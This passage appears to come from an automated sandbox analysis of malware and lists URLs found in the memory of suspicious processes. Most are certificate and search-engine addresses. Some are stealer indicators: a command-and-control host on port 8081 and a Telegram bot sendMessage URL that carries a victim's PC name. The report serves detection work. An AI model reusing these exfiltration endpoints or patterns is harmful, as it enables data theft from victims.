                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002569C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: brightness.exe, 00000007.00000003.2123550803.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161107303.0000000021426000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163281507.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2128046542.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2162496281.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.7.drString found in binary or memory: http://ocsp.comodoca.com0$
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: brightness.exe, 00000007.00000003.2123550803.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161107303.0000000021426000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163281507.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2128046542.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2162496281.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.7.drString found in binary or memory: http://www.pmail.com0
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022893000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002289D000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021170000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C221000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, 